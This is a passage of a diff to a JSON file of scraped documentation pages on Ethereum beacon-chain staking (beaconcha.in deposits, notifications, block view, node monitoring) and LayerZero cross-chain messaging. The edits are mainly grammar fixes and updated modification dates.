Missing Aggregator There are 16 Aggregators per epoch in total; additionally, random validators from the beacon-chain subscribe to two subnets for 256 Epochs and serve as a backup in case aggregators are missing. Missing block proposer Note that in some cases a lucky aggregator may also become the block proposer. If the attestation was not included because the block proposer has gone missing, the next block proposer would pick the aggregated attestation up and include it in the next block. However, the inclusion delay will increase by one. Credits Attestation effectiveness - AttestantIO Attestation Inclusion - Adrian Sutton (Consensys) Previous Deposit Process Next Rewards and Penalties Last modified 3yr ago", "labels": [ "Documentation" ] @@ -850,7 +850,7 @@ { "title": "Deposit Process", "html_url": "https://kb.beaconcha.in/ethereum-2.0-depositing", - "body": "Deposit Process This post will explain the depositing process and each of the phases. Before we start, to understand the basic idea of how Ethereum 2.0 keys work, the Ethereum 2.0 Keys blog is highly recommended. The deposit contract Let's go through each of the states above and explain how their durations are approximately determined. 1. Mempool - Status: Unknown Every signed transaction visits the Mempool first, which can be referred to as the waiting room for transactions. During this period, the transaction status is pending . Depending on the chosen gas fee for the transaction, miners pick the ones that return them the most value first. If the network is highly congested (=many pending transactions), there's a high chance that new transactions will outbid(gas fees) older transactions, leading to unknown waiting times. 2. Deposit contract - Status: Deposited Once the transaction reaches the deposit contract, the deposit contract checks the transaction for its Input data and value. If the threshold of 1 ETH is not met or the transaction has no/invalid input data, the transaction will get rejected and returned to the sender. The user-created input data is a reflection of the upcoming validator and withdrawal keys on the Ethereum 2.0 network as seen in the picture below. The full Ethereum 2.0 keys blog is here . Why exactly does this take at least 13.6 hours? The Ethereum 2.0 chain only considers transactions which have been in the deposit contract for at least 2048 Ethereum 1.0 blocks to ensure they never end up in a reorged block. (= ETH1_FOLLOW_DISTANCE ) In addition to the 2048 Ethereum 1.0 blocks, 64 Ethereum 2.0 Epochs ****must be**** awaited before the beacon-chain recognises the deposit. During these 64 Epochs, validators vote on newly received deposits. However, missed block proposals or bad Ethereum 1.0 nodes, which provide the deposit logs to the Ethereum 2.0 network can cause longer waiting times. Therefore, run your own node ! 2048 blocks = 2048 x 12 seconds = 24,576 seconds = 409.6 minutes = ~6.82 hours 64 Epochs = 64 x 6.4 minutes = 409.6 minutes = ~6.82 hours Once the deposit is in the deposit contract, the state of the validator will switch to Deposited on the beaconcha.in explorer. Rejected Deposit Rejected Transaction 3. Validator Queue - Status: Pending The deposit is accessible now for the beacon-chain. Depending on the amount of total deposits, the validators have to wait in a queue. Eight validators per Epoch ( 1800 validators per day) can get activated. 4. Staking - Status: Active The validator is now actively staking. It is proposing blocks and signing attestations - ready to earn ETH!
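A rough Python sketch of the reward arithmetic quoted in the attestation entry above. This is a simplification for illustration: it keeps only the base-reward formula and the inclusion-delay scaling (delay 2 halves the reward, as in the text), and ignores the proposer's share and the other reward components of the full spec.

```python
from math import isqrt

def base_reward(effective_balance_gwei, total_active_gwei):
    # ( Validator effective balance * 2**6 ) / SQRT( total active balance )
    return effective_balance_gwei * 2**6 // isqrt(total_active_gwei)

def attestation_reward(effective_balance_gwei, total_active_gwei, inclusion_delay):
    # Delay 1 pays the full base reward; delay 2 pays ~50%, and so on.
    return base_reward(effective_balance_gwei, total_active_gwei) // inclusion_delay

GWEI_PER_ETH = 10**9
total = 16_384 * 32 * GWEI_PER_ETH          # the minimum genesis validator set
print(attestation_reward(32 * GWEI_PER_ETH, total, 1))
print(attestation_reward(32 * GWEI_PER_ETH, total, 2))  # half of the above
```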
Other validator status Deposit Invalid The transaction had an invalid BLS signature. Active Offline An active validator has not been attesting for at least two epochs. Exiting Online The validator is online and currently exiting the network because either its balance dropped below 16ETH (forced exit) or the exit was requested (voluntary exit) by the validator. Exiting Offline The validator is offline and currently exiting the network because either its balance dropped below 16ETH or the exit was requested by the validator. Slashing Online The validator is online but was malicious and therefore forced to exit the network. Slashing Offline The validator is offline and was malicious and which lead to a forced to exit out of the network. The validator is currently in the exiting queue with a minimum of 25 minutes. Slashed The validator has been kicked out of the network. The funds will be withdrawable after 36 days. Exited The validator has exited the network. The funds will be withdrawable after 1 day. Previous The Genesis Event Next Attestation Last modified 4mo ago", + "body": "Deposit Process This post will explain the depositing process and each of the phases. Before we start, to understand the basic idea of how Ethereum 2.0 keys work, the Ethereum 2.0 Keys blog is highly recommended. The deposit contract Let's go through each of the states above and explain how their durations are approximately determined. 1. Mempool - Status: Unknown Every signed transaction visits the Mempool first, which can be referred to as the waiting room for transactions. During this period, the transaction status is pending . Depending on the chosen gas fee for the transaction, miners pick the ones that return them the most value first. If the network is highly congested (=many pending transactions), there's a high chance that new transactions will outbid (in gas fees) older transactions, leading to unknown waiting times. 2. Deposit contract - Status: Deposited Once the transaction reaches the deposit contract, the deposit contract checks the transaction for its Input data and value. If the threshold of 1 ETH is not met or the transaction has no/invalid input data, the transaction will get rejected and returned to the sender. The user-created input data is a reflection of the upcoming validator and withdrawal keys on the Ethereum 2.0 network as seen in the picture below. The full Ethereum 2.0 keys blog is here . Why exactly does this take at least 13.6 hours? The Ethereum 2.0 chain only considers transactions which have been in the deposit contract for at least 2048 Ethereum 1.0 blocks to ensure they never end up in a reorged block. (= ETH1_FOLLOW_DISTANCE ) In addition to the 2048 Ethereum 1.0 blocks, 64 Ethereum 2.0 Epochs must be awaited before the beacon-chain recognises the deposit. During these 64 Epochs, validators vote on newly received deposits. However, missed block proposals or bad Ethereum 1.0 nodes (which provide the deposit logs to the Ethereum 2.0 network) can cause longer waiting times. Therefore, run your own node ! 2048 blocks = 2048 x 12 seconds = 24,576 seconds = 409.6 minutes = ~6.82 hours 64 Epochs = 64 x 6.4 minutes = 409.6 minutes = ~6.82 hours Once the deposit is in the deposit contract, the state of the validator will switch to Deposited on the beaconcha.in explorer. Rejected Deposit Rejected Transaction 3. Validator Queue - Status: Pending The deposit is accessible now for the beacon-chain. Depending on the amount of total deposits, the validators have to wait in a queue.
Eight validators per Epoch ( 1800 validators per day) can get activated. 4. Staking - Status: Active The validator is now actively staking. It is proposing blocks and signing attestations - ready to earn ETH! Other validator status Deposit Invalid The transaction had an invalid BLS signature. Active Offline An active validator has not been attesting for at least two epochs. Exiting Online The validator is online and currently exiting the network because either its balance dropped below 16 ETH (forced exit) or the exit was requested (voluntary exit) by the validator. Exiting Offline The validator is offline and currently exiting the network because either its balance dropped below 16 ETH or the exit was requested by the validator. Slashing Online The validator is online but was malicious and therefore forced to exit the network. Slashing Offline The validator is offline and was malicious, which led to a forced exit from the network. The validator is currently in the exiting queue with a minimum of 25 minutes. Slashed The validator has been kicked out of the network. The funds will be withdrawable after 36 days. Exited The validator has exited the network. The funds will be withdrawable after 1 day. Previous The Genesis Event Next Attestation Last modified 5mo ago", "labels": [ "Documentation" ] @@ -938,7 +938,7 @@ { "title": "beaconcha.in notifications", "html_url": "https://kb.beaconcha.in/beaconcha.in-explorer/beaconcha.in-notifications", - "body": "beaconcha.in notifications This article provides a tutorial on setting up and debugging notifications using beaconcha.in's web and mobile platforms. It's worth noting that the current notification center will undergo an upgrade in late 2023 to upgrade its user-friendliness. Enabling notifications via web 1. Head over to https://beaconcha.in/user/notifications and log in with your e-mail address. 2. Click on \"Notifications Channels\" and make sure the desired channels are active 3. Scroll down to the Validators table and add your validators. Once added you can select all and bulk edit the notifications by clicking Manage selected . 4. Enable the desired notification(s) and press Save . 5. Verify that the subscriptions are enabled 6. If a notification was triggered it will show up in the Most recent column 7. Done! You may have noticed that the Notification Center allows you to configure Push notifications for the mobile app.
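The waiting-time arithmetic in the deposit entry above can be checked in a few lines of Python, using only the constants quoted in the text (12-second blocks/slots, 32-slot epochs, 2048-block follow distance, 64 epochs of voting, 8 activations per epoch):

```python
SECONDS_PER_SLOT = 12           # also the Ethereum 1.0 block time used in the text
SLOTS_PER_EPOCH = 32            # one epoch = 32 * 12 s = 6.4 minutes
ETH1_FOLLOW_DISTANCE = 2048
EPOCHS_TO_WAIT = 64

follow_h = ETH1_FOLLOW_DISTANCE * SECONDS_PER_SLOT / 3600
vote_h = EPOCHS_TO_WAIT * SLOTS_PER_EPOCH * SECONDS_PER_SLOT / 3600
print(f"{follow_h:.2f} h + {vote_h:.2f} h = {follow_h + vote_h:.2f} h")  # ~13.65 h

epochs_per_day = 24 * 3600 // (SLOTS_PER_EPOCH * SECONDS_PER_SLOT)  # 225
print(epochs_per_day * 8)  # 8 activations per epoch -> 1800 validators per day
```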
This is crucial since some users may not receive any push notifications if it is disabled. Mobile app 1. Download the app for iOS and Android here https://beaconcha.in/mobile 2. Create an account and log in with your e-mail address Note : If you added validators to your Notification center through https://beaconcha.in/user/notifications they will not appear in your mobile app automatically. If push notifications were enabled in the web notification center, the mobile app push the notifications through even if the validators are not visible in your app. This UX issue will be part of the improvements later this year. 3. Add validators to your mobile app dashboard 4. Head over to the settings and enable the desired notifications 5. Click the \"Sync\" button in the Validator section 6. Done! Verify that the notifications were added successfully by logging in at https://beaconcha.in/user/notifications and scrolling to the Validator table at the bottom of the page You may have noticed that the Notification Center allows you to configure Push notifications for the mobile app. This is crucial since some users may not receive any push notifications if it is disabled. Webhooks 1. Follow the steps as described above in \" Enabling notifications via web\" . 2. Double-check that webhooks are enabled 3. Add a webhook via https://beaconcha.in/user/webhooks 4. Enable the same notification types as on the notification center and enable \"discord\" if the notifications should be sent to a discord channel 5. Done Beaconcha.in Explorer - Previous Mobile App <> Node Monitoring Next - Beaconcha.in Explorer Block view Last modified 4mo ago", + "body": "beaconcha.in notifications This article provides a tutorial on setting up and debugging notifications using beaconcha.in's web and mobile platforms. It's worth noting that the current notification center will undergo an upgrade in late 2023 to improve its user-friendliness. Enabling notifications via web 1. Head over to https://beaconcha.in/user/notifications and log in with your e-mail address. 2. Click on \"Notifications Channels\" and make sure the desired channels are active 3. Scroll down to the Validators table and add your validators. Once added you can select all and bulk edit the notifications by clicking Manage selected . 4. Enable the desired notification(s) and press Save . 5. Verify that the subscriptions are enabled 6. If a notification was triggered it will show up in the Most recent column 7. Done! You may have noticed that the Notification Center allows you to configure Push notifications for the mobile app. This is crucial since some users may not receive any push notifications if it is disabled. Mobile app 1. Download the app for iOS and Android here https://beaconcha.in/mobile 2. Create an account and log in with your e-mail address Note : If you added validators to your Notification center through https://beaconcha.in/user/notifications they will not appear in your mobile app automatically. If push notifications were enabled in the web notification center, the mobile app will push the notifications through even if the validators are not visible in your app. This UX issue will be part of the improvements later this year. 3. Add validators to your mobile app dashboard 4. Head over to the settings and enable the desired notifications 5. Click the \"Sync\" button in the Validator section 6. Done! Verify that the notifications were added successfully by logging in at https://beaconcha.in/user/notifications and scrolling to the Validator table at the bottom of the page You may have noticed that the Notification Center allows you to configure Push notifications for the mobile app. This is crucial since some users may not receive any push notifications if it is disabled. Webhooks 1. Follow the steps as described above in \" Enabling notifications via web\" . 2. Double-check that webhooks are enabled 3. Add a webhook via https://beaconcha.in/user/webhooks 4. Enable the same notification types as on the notification center and enable \"discord\" if the notifications should be sent to a discord channel 5.
Done Beaconcha.in Explorer - Previous Mobile App <> Node Monitoring Next - Beaconcha.in Explorer Block view Last modified 5mo ago", "labels": [ "Documentation" ] @@ -954,7 +954,7 @@ { "title": "Block view", "html_url": "https://kb.beaconcha.in/beaconcha.in-explorer/ethereum-2.0-blocks", - "body": "Block view Blocks 'n' roots This post is going to lay out data, Ethereum 2.0 explorers such as beaconcha.in visualise Overview Epoch , Slot , Status , Proposer are covered in the glossary Block root The hash-tree-root of the BeaconBlock . State root The hash-tree-root of the BeaconState . Signature The BLS signature obtained by using the BeaconState, BeaconBlock and private key. def get_block_signature(state: BeaconState, block: BeaconBlock, privkey: int) -> BLSSignature Randao Reveal TODO Grafitti A block proposer can include 32 byte long message to its block proposal. Eth 1 Data Received Eth1 Block headers and Deposit data Block Hash: The Hash of the received Eth1 Block. Deposit Count: Amount of validator deposits to the deposit contract in this block. Deposit Root: The root of the merkle tree of deposits. Attestations Amount of attestations included in this block by the block proposer. Deposits Amount of validator deposits which have been included in this block by the block proposer Voluntary Exits Amount of voluntary Exits which have been included in this block by the block proposer. Slashings Amount of slashings which have been included in this block by the block proposer. Votes Represents the total amount of votes in a specific block. In the example below there were 128 attestations. These attestations received a total of 2802 votes. The aggregation bit is an additional way of representing the votes. Attestations Slot Is the slot number to which the validator is attesting. The slot number points to the same block as the beacon-block-root. Committee Index Every epoch the total number of validators is split up in committees and one or more individual committees are responsible to attest to each slot. The committee Index is the identifier for this specific committee during a slot. Aggregation Bits Represents the aggregated attestation of all participating validators in this attestation. Each \"1\" bit is a successful attestation submitted by the validator. \"0\" bits visualise missed attestations. Validators Validators who have submitted their attestation and have been included by the block proposer. Beacon Block Root The beacon block root points to the block to which validators are attesting. The difference between the block number in which the attestation has been included, and the one the beacon block root is pointing to, causes the attestation inclusion delay. Source & Target These are two additional votes a validator has to submit. The source points to the latest justified epoch, and the target to the latest epoch boundary. Signature Beaconcha.in Explorer - Previous beaconcha.in notifications Next - Beaconcha.in Explorer Beaconcha.in Charts Last modified 2yr ago", + "body": "Block view Blocks 'n' roots This post is going to lay out the data that Ethereum 2.0 explorers such as beaconcha.in visualise. Overview Epoch , Slot , Status , Proposer are covered in the glossary Block root The hash-tree-root of the BeaconBlock . State root The hash-tree-root of the BeaconState . Signature The BLS signature obtained by using the BeaconState, BeaconBlock and private key.
def get_block_signature(state: BeaconState, block: BeaconBlock, privkey: int) -> BLSSignature Randao Reveal TODO Graffiti A block proposer can include a 32-byte-long message in its block proposal. Eth 1 Data Received Eth1 Block headers and Deposit data Block Hash: The Hash of the received Eth1 Block. Deposit Count: Amount of validator deposits to the deposit contract in this block. Deposit Root: The root of the merkle tree of deposits. Attestations Amount of attestations included in this block by the block proposer. Deposits Amount of validator deposits which have been included in this block by the block proposer. Voluntary Exits Amount of voluntary Exits which have been included in this block by the block proposer. Slashings Amount of slashings which have been included in this block by the block proposer. Votes Represents the total amount of votes in a specific block. In the example below there were 128 attestations. These attestations received a total of 2802 votes. The aggregation bit is an additional way of representing the votes. Attestations Slot Is the slot number to which the validator is attesting. The slot number points to the same block as the beacon-block-root. Committee Index Every epoch the total number of validators is split up in committees and one or more individual committees are responsible to attest to each slot. The committee Index is the identifier for this specific committee during a slot. Aggregation Bits Represents the aggregated attestation of all participating validators in this attestation. Each \"1\" bit is a successful attestation submitted by the validator. \"0\" bits visualise missed attestations. Validators Validators who have submitted their attestation and have been included by the block proposer. Beacon Block Root The beacon block root points to the block to which validators are attesting. The difference between the block number in which the attestation has been included, and the one the beacon block root is pointing to, causes the attestation inclusion delay. Source & Target These are two additional votes a validator has to submit. The source points to the latest justified epoch, and the target to the latest epoch boundary. Signature Beaconcha.in Explorer - Previous beaconcha.in notifications Next - Beaconcha.in Explorer Beaconcha.in Charts Last modified 3yr ago", "labels": [ "Documentation" ] @@ -962,7 +962,7 @@ { "title": "Mobile App <> Node Monitoring", "html_url": "https://kb.beaconcha.in/beaconcha.in-explorer/mobile-app-less-than-greater-than-beacon-node", - "body": "Mobile App <> Node Monitoring A step by step tutorial on how to monitor your staking device & beaconnode on the beaconcha.in mobile app. General This is a free monitoring tool provided by beaconcha.in to enhance the solo staking experience. The user specifies the monitoring endpoint on its beacon & validator node. By using this endpoint, beaconcha.in will be allowed and is required to store the given data to display it in the beaconcha.in the mobile application. To protect user privacy, the IP address will never be stored. Requirements beaconcha.in Account beaconcha.in Mobile App Lighthouse v.1.4.0 or higher Prysm v1.3.10 or higher Nimbus v1.4.1 or higher Teku v22.3.0 or higher Lodestar v1.6.0 or higher Staking on Linux (No windows support by clients yet!) Please adjust the network on the beaconcha.in browser and mobile app accordingly. Both, the beaconcha.in explorer and the mobile app are open source! Lighthouse A step by step guide on the Prater Testnet.
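To make the aggregation-bits description in the block view above concrete, here is a few lines of Python. The bitstrings are illustrative, not real committee data; each "1" is a validator whose attestation made it into the aggregate, each "0" a miss, and summing the set bits across all aggregates in a block gives the block's total vote count (as in the 128 attestations / 2802 votes example).

```python
# Illustrative aggregation bits for two aggregated attestations.
aggregation_bits = [
    "1101",   # committee members 0, 1 and 3 attested
    "0111",   # committee members 1, 2 and 3 attested
]

votes = sum(bits.count("1") for bits in aggregation_bits)
missed = sum(bits.count("0") for bits in aggregation_bits)
print(votes, missed)  # -> 6 2
```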
Please adjust the network for your own needs. 1. Open the Mobile App Tab and enter a name for your staking setup. Use the same worker name even if your beaconnode runs on a seperate machine than your validator node. __ __Copy the generated flag and paste it add it to your beacon & validator node __ If your beacon-node or Ethereum 1.0 node is not in sync yet, you will see some warning logs! 2. Open the beaconcha.in mobile app and login with your account under Preferences. Your staking device will appear under Machines ! Prysm 1. Head over to the beaconcha.in settings and open the prysm section: 2. Open a new Terminal and copy paste the commands 3. Make sure your Prysm client (beacon & validator) is already up and running. The exporter will now send the data to your mobile app! 4. Wait a few minutes and open the beaconcha.in mobile app and login with your account under Preferences. Your staking device will appear under Machines ! Nimbus 1. Head over to the beaconcha.in settings and open the nimbus section: 2. Add --metrics --metrics-port=8008 to your nimbus client! Otherwise the exporter will not be able to get any data from your client. 3. Wait a few minutes and open the beaconcha.in mobile app and login with your account under Preferences. Your staking device will appear under Machines ! Teku Add the following endpoint to your teku node --metrics-publish-endpoint https://beaconcha.in/api/v1/client/metrics?apikey=YOUR_API_KEY You can find your API Key here: https://beaconcha.in/user/settings#app Lodestar Add the following CLI flag to your Lodestar validator and beaconnode --monitoring.endpoint 'https://beaconcha.in/api/v1/client/metrics?apikey=YOUR_API_KEY' You can find your API Key in the account settings . Check out the Lodestar documentation about client monitoring for further details. Monitoring with Rocket Pool Works with Lighthouse, Lodestar, Teku and Nimbus only. **** Lighthouse, Lodestar and Teku Add Your beaconcha.in API key in Monitoring/Metrics (service config) **** Nimbus Nimbus does not expose every data, thus, some data such as validators are not visible in the app. Guide: https://gist.github.com/jshufro/89e32d417801bf3dfb02c32a983b63cf Previous Rewards and Penalties Next - Beaconcha.in Explorer beaconcha.in notifications Last modified 4mo ago", + "body": "Mobile App <> Node Monitoring A step by step tutorial on how to monitor your staking device & beaconnode on the beaconcha.in mobile app. General This is a free monitoring tool provided by beaconcha.in to enhance the solo staking experience. The user specifies the monitoring endpoint on their beacon & validator node. By using this endpoint, beaconcha.in will be allowed and is required to store the given data to display it in the beaconcha.in mobile application. To protect user privacy, the IP address will never be stored. Requirements beaconcha.in Account beaconcha.in Mobile App Lighthouse v.1.4.0 or higher Prysm v1.3.10 or higher Nimbus v1.4.1 or higher Teku v22.3.0 or higher Lodestar v1.6.0 or higher Staking on Linux (No Windows support by clients yet!) Please adjust the network on the beaconcha.in browser and mobile app accordingly. Both the beaconcha.in explorer and the mobile app are open source! Lighthouse A step by step guide on the Prater Testnet. Please adjust the network for your own needs. 1. Open the Mobile App Tab and enter a name for your staking setup. Use the same worker name even if your beaconnode runs on a separate machine from your validator node.
Copy the generated flag and add it to your beacon & validator node. If your beacon-node or Ethereum 1.0 node is not in sync yet, you will see some warning logs! 2. Open the beaconcha.in mobile app and login with your account under Preferences. Your staking device will appear under Machines ! Prysm 1. Head over to the beaconcha.in settings and open the prysm section: 2. Open a new Terminal and copy-paste the commands 3. Make sure your Prysm client (beacon & validator) is already up and running. The exporter will now send the data to your mobile app! 4. Wait a few minutes and open the beaconcha.in mobile app and login with your account under Preferences. Your staking device will appear under Machines ! Nimbus 1. Head over to the beaconcha.in settings and open the nimbus section: 2. Add --metrics --metrics-port=8008 to your nimbus client! Otherwise the exporter will not be able to get any data from your client. 3. Wait a few minutes and open the beaconcha.in mobile app and login with your account under Preferences. Your staking device will appear under Machines ! Teku Add the following endpoint to your teku node --metrics-publish-endpoint https://beaconcha.in/api/v1/client/metrics?apikey=YOUR_API_KEY You can find your API Key here: https://beaconcha.in/user/settings#app Lodestar Add the following CLI flag to your Lodestar validator and beaconnode --monitoring.endpoint 'https://beaconcha.in/api/v1/client/metrics?apikey=YOUR_API_KEY' You can find your API Key in the account settings . Check out the Lodestar documentation about client monitoring for further details. Monitoring with Rocket Pool Works with Lighthouse, Lodestar, Teku and Nimbus only. Lighthouse, Lodestar and Teku Add Your beaconcha.in API key in Monitoring/Metrics (service config) Nimbus Nimbus does not expose all data; thus, some data, such as validators, is not visible in the app. Guide: https://gist.github.com/jshufro/89e32d417801bf3dfb02c32a983b63cf Previous Rewards and Penalties Next - Beaconcha.in Explorer beaconcha.in notifications Last modified 5mo ago", "labels": [ "Documentation" ] @@ -970,7 +970,7 @@ { "title": "Optimal Inclusion Distance", "html_url": "https://kb.beaconcha.in/beaconcha.in-explorer/optimal-inclusion-distance", - "body": "Optimal Inclusion Distance The attestation for slot 156508 was included in slot 156510 but why is the inclusion distance 0? If were to use the formula from above and set the inclusion delay to 0, the rewards would be 0 for a proposed attestation. Missed blocks are not added to the inclusion distance, but since the attestant is not responsible for the block proposal, and to only warn the user about its faults (e.g. slow internet connection, power failure etc.), the beaconcha.in explorer displays the distance as 0. Beaconcha.in Explorer - Previous Beaconcha.in Charts Next - Guides Step by Step: How to join the Ethereum 2.0 Testnet Last modified 2yr ago", + "body": "Optimal Inclusion Distance The attestation for slot 156508 was included in slot 156510, but why is the inclusion distance 0? If we were to use the formula from above and set the inclusion delay to 0, the rewards would be 0 for a proposed attestation. Missed blocks are not added to the inclusion distance, but since the attestant is not responsible for the block proposal, and to only warn the user about its own faults (e.g. slow internet connection, power failure, etc.), the beaconcha.in explorer displays the distance as 0.
Beaconcha.in Explorer - Previous Beaconcha.in Charts Next - Guides Step by Step: How to join the Ethereum 2.0 Testnet Last modified 3yr ago", "labels": [ "Documentation" ] @@ -1114,7 +1114,7 @@ { "title": "What is LayerZero", "html_url": "https://layerzero.gitbook.io/docs/", - "body": "What is LayerZero Omnichain communication, interoperability, decentralized infrastructure LayerZero's default oracle will be updated to Google Cloud Oracle as of 9/19/23 , details of which you can find here . LayerZero is an omnichain interoperability protocol designed for lightweight message passing across chains. LayerZero provides authentic and guaranteed message delivery with configurable trustlessness. Where can I find more information? For the message protocol design, check out the white paper found on the website . If you are looking for a detailed system architecture explanation, check out the architectures section on the Endpoint and the Ultra-Light Node. Code Examples Learn how to integrate LayerZero into your contracts and take a look at our deployed contracts for Mainnet and Testnet usage. If you want to see some examples to play around head over to our github . See how to send a LayerZero message Next - Bug Bounty Bug Bounty Program Last modified 11d ago", + "body": "What is LayerZero Omnichain communication, interoperability, decentralized infrastructure LayerZero's default oracle will be updated to Google Cloud Oracle as of 9/19/23 , details of which you can find here . LayerZero is an omnichain interoperability protocol designed for lightweight message passing across chains. LayerZero provides authentic and guaranteed message delivery with configurable trustlessness. Where can I find more information? For the message protocol design, check out the white paper found on the website . If you are looking for a detailed system architecture explanation, check out the architectures section on the Endpoint and the Ultra-Light Node. Code Examples Learn how to integrate LayerZero into your contracts and take a look at our deployed contracts for Mainnet and Testnet usage. If you want to see some examples to play around head over to our github . See how to send a LayerZero message Next - Bug Bounty Bug Bounty Program Last modified 1mo ago", "labels": [ "Documentation" ] @@ -1122,7 +1122,7 @@ { "title": "Code Examples", "html_url": "https://layerzero.gitbook.io/docs/aptos-guide/code-examples", - "body": "Code Examples Take a look at the following MOVE Examples to get started: LayerZero-Aptos-Contract/bridge.move at main LayerZero-Labs/LayerZero-Aptos-Contract GitHub TokenBridge LayerZero-Aptos-Contract/counter.move at main LayerZero-Labs/LayerZero-Aptos-Contract GitHub OmniCounter Aptos Guide - Previous LZApp Modules Next OmniCounter.move Last modified 10mo ago", + "body": "Code Examples Take a look at the following MOVE Examples to get started: LayerZero-Aptos-Contract/bridge.move at main LayerZero-Labs/LayerZero-Aptos-Contract GitHub TokenBridge LayerZero-Aptos-Contract/counter.move at main LayerZero-Labs/LayerZero-Aptos-Contract GitHub OmniCounter Aptos Guide - Previous LZApp Modules Next OmniCounter.move Last modified 18d ago", "labels": [ "Documentation" ] @@ -1130,7 +1130,7 @@ { "title": "LZApp Modules", "html_url": "https://layerzero.gitbook.io/docs/aptos-guide/lzapp-modules", - "body": "LZApp Modules We provide some common modules to help build your UAs to let you put more focus on your business logic. These modules provide many useful functions that are commonly used in most UAs. 
You can use them directly as they are already deployed by LayerZero, or you can copy them to your own modules and modify them to fit your needs. LZApp The LZApp module provides a simple way for you to manage your UA's configurations and handle error messages. 1. Provides entry functions to config instead of calling from app with UaCapability 2. Allows the app to drop/store the next payload 3. Enables to send a layerzero message with Aptos coin and/or ZRO coin It is very simple to use it, initializing by calling the following in your UA: fun init(account: &signer, cap: UaCapability) LayerZero-Aptos-Contract/lzapp.move at main LayerZero-Labs/LayerZero-Aptos-Contract GitHub LZApp Module LayerZero-Aptos-Contract/remote.move at main LayerZero-Labs/LayerZero-Aptos-Contract GitHub LZApp Remote Module Previous Receive Messages Next - Aptos Guide Code Examples Last modified 10mo ago", + "body": "LZApp Modules We provide some common modules to help you build your UAs and let you put more focus on your business logic. These modules provide many useful functions that are commonly used in most UAs. You can use them directly as they are already deployed by LayerZero, or you can copy them to your own modules and modify them to fit your needs. LZApp The LZApp module provides a simple way for you to manage your UA's configurations and handle error messages. 1. Provides entry functions to config instead of calling from app with UaCapability 2. Allows the app to drop/store the next payload 3. Enables sending a LayerZero message with Aptos coin and/or ZRO coin It is very simple to use: initialize it by calling the following in your UA: fun init(account: &signer, cap: UaCapability) LayerZero-Aptos-Contract/lzapp.move at main LayerZero-Labs/LayerZero-Aptos-Contract GitHub LZApp Module LayerZero-Aptos-Contract/remote.move at main LayerZero-Labs/LayerZero-Aptos-Contract GitHub LZApp Remote Module Previous Receive Messages Next - Aptos Guide Code Examples Last modified 11mo ago", "labels": [ "Documentation" ] @@ -1138,7 +1138,7 @@ { "title": "Getting Started", "html_url": "https://layerzero.gitbook.io/docs/aptos-guide/master", - "body": "Getting Started Developing on LayerZero is as simple as it gets - just implement the register_ua() , send() and lz_receive() interfaces and your app is ready to send messages across connected chains. To get started, check register_ua() , send() and lz_receive() . Or dive right in with a simple code example here . FAQ Learn answers to Frequently Asked Questions . Talk to the Team Twitter Telegram Discord Medium Official Website https://layerzero.network/ EVM Guides - Previous Omnichain Governance Next Register UA Last modified 10mo ago", + "body": "Getting Started Developing on LayerZero is as simple as it gets - just implement the register_ua() , send() and lz_receive() interfaces and your app is ready to send messages across connected chains. To get started, check register_ua() , send() and lz_receive() . Or dive right in with a simple code example here . FAQ Learn answers to Frequently Asked Questions .
Talk to the Team Twitter Telegram Discord Medium Official Website https://layerzero.network/ EVM Guides - Previous Omnichain Governance Next Register UA Last modified 1yr ago", "labels": [ "Documentation" ] @@ -1146,7 +1146,7 @@ { "title": "UA Custom Configuration", "html_url": "https://layerzero.gitbook.io/docs/aptos-guide/ua-custom-configuration", - "body": "UA Custom Configuration User Application contracts may set their own configuration for message library, relayer, oracle, etc. public fun set_config < UA > ( major_version : u64 , minor_version : u8 , chain_id : u64 , config_type : u8 , config_bytes : vector < u8 > , _cap : & UaCapability < UA > ) public fun set_send_msglib < UA > ( chain_id : u64 , major_version : u64 , minor_version : u8 , _cap : & UaCapability < UA > ) public fun set_receive_msglib < UA > ( chain_id : u64 , major_version : u64 , minor_version : u8 , _cap : & UaCapability < UA > ) public fun set_executor < UA > ( chain_id : u64 , version : u64 , executor : address , _cap : & UaCapability < UA > ) Previous Estimating Message Fees Next - Ecosystem Relayer Last modified 13d ago", + "body": "UA Custom Configuration User Application contracts may set their own configuration for message library, relayer, oracle, etc. public fun set_config<UA>(major_version: u64, minor_version: u8, chain_id: u64, config_type: u8, config_bytes: vector<u8>, _cap: &UaCapability<UA>) public fun set_send_msglib<UA>(chain_id: u64, major_version: u64, minor_version: u8, _cap: &UaCapability<UA>) public fun set_receive_msglib<UA>(chain_id: u64, major_version: u64, minor_version: u8, _cap: &UaCapability<UA>) public fun set_executor<UA>(chain_id: u64, version: u64, executor: address, _cap: &UaCapability<UA>) Previous Estimating Message Fees Next - Ecosystem Relayer Last modified 1mo ago", "labels": [ "Documentation" ] @@ -1154,7 +1154,7 @@ { "title": "Bug Bounty Program", "html_url": "https://layerzero.gitbook.io/docs/bug-bounty/bug-bounty-program", - "body": "Bug Bounty Program LayerZero has an absolute commitment to continuously evaluating and improving security, to demonstrate this we are pleased to run the largest live bug bounty program across the industry at up to $15M! You can read more about the program and make reports via Immunefi . To date LayerZero has awarded almost $1M to white hats that have made disclosures. A separate bug bounty of up to $2M exists specifically covering The Aptos Bridge , which will in time increase in scope to join the above program. More details on this separate bounty program can be found here . Previous What is LayerZero Next - Concepts Messaging Properties Last modified 12d ago", + "body": "Bug Bounty Program LayerZero has an absolute commitment to continuously evaluating and improving security; to demonstrate this, we are pleased to run the largest live bug bounty program across the industry, at up to $15M! You can read more about the program and make reports via Immunefi . To date LayerZero has awarded almost $1M to white hats that have made disclosures. A separate bug bounty of up to $2M exists specifically covering The Aptos Bridge , which will in time increase in scope to join the above program. More details on this separate bounty program can be found here .
Previous What is LayerZero Next - Concepts Messaging Properties Last modified 1mo ago", "labels": [ "Documentation" ] @@ -1162,7 +1162,7 @@ { "title": "Oracle", "html_url": "https://layerzero.gitbook.io/docs/ecosystem/oracle", - "body": "Oracle Helps secure the network. Each User Application can opt-in to any Oracle LayerZero's default oracle provider will be updated as of 9/19/23 , details of which you can find here . The Oracle performs a role in securing LayerZero's messaging protocol by moving data between chains. Each oracle has the task of moving a requested block header from a source chain to a destination chain. An oracle works in tandem with a Relayer . Each User Application contract built on LayerZero will work without configuration using defaults, but a UA will also be able to configure its own Oracle and Relayer . Previous Max Proof Cost Estimate Next Default Oracle Updates Last modified 13d ago", + "body": "Oracle Helps secure the network. Each User Application can opt-in to any Oracle LayerZero's default oracle provider will be updated as of 9/19/23 , details of which you can find here . The Oracle performs a role in securing LayerZero's messaging protocol by moving data between chains. Each oracle has the task of moving a requested block header from a source chain to a destination chain. An oracle works in tandem with a Relayer . Each User Application contract built on LayerZero will work without configuration using defaults, but a UA will also be able to configure its own Oracle and Relayer . Previous Max Proof Cost Estimate Next 